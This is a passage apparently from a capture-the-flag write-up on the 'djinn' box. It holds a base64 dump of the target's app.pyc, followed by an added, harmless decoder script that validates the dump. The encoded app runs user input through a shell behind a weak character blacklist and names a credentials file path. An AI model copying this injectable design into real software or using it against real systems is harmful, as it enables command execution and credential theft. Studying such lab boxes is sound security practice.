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
DAIoAgwBCQIGAh4DCQ4hBSQPJAoMAQ==
Write the copied content into a file named app64.
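Added example, not part of the write-up: a small decoder for the step just described. It takes the text copied out of the terminal (prompt line and echoed command included, since the reverse shell had no proper tty), keeps only the base64 lines, decodes them strictly and checks the .pyc magic number before the file is trusted. The dump embedded in it is a constructed 12-byte stand-in for app.pyc, not the real file from the box.

```python
import base64
import binascii
import re
import struct

# A pasted terminal dump as the page's step produces it: the prompt line, the
# echoed command, then the wrapped base64 lines. The file content here is a
# constructed 12-byte stand-in (Python 2.7 magic, zero mtime, "test"), not the
# real app.pyc from the box.
SAMPLE_DUMP = """sam@djinn:/opt/80$ base64 app.pyc
base64 app.pyc
A/MNCgAA
AAB0ZXN0
"""

# A line of the dump counts as data only if it is nothing but base64 symbols;
# a bare word on its own line (a stray prompt fragment) would still slip
# through, so check the decoded file before trusting it
B64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_base64_dump(text):
    """Join the base64 lines of a pasted dump and decode them strictly."""
    lines = [line.strip() for line in text.splitlines()]
    payload = "".join(line for line in lines if B64_LINE.match(line))
    try:
        # validate=True rejects stray characters instead of silently skipping them
        return base64.b64decode(payload, validate=True)
    except binascii.Error as exc:
        raise ValueError("dump is not valid base64: %s" % exc)


def describe_pyc(data):
    """Name the CPython release from a .pyc magic number, or None if not a .pyc."""
    if len(data) < 8 or data[2:4] != b"\r\n":
        return None
    magic = struct.unpack("<H", data[:2])[0]
    # 62211 (bytes 03 f3 0d 0a) is the magic CPython 2.7 writes, which matches
    # the "Python 2.7.15+" Werkzeug banner nmap reported for this box
    return {62211: "Python 2.7"}.get(magic, "unknown magic %d" % magic)


if __name__ == "__main__":
    recovered = decode_base64_dump(SAMPLE_DUMP)
    print(len(recovered), "bytes recovered;", describe_pyc(recovered))
```

The magic check is the cheap integrity test: the first base64 line of the real dump above also starts with A/MN, which is exactly those four magic bytes, so a copy that lost or gained a character at the start would be caught before decompiling.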
┌──(root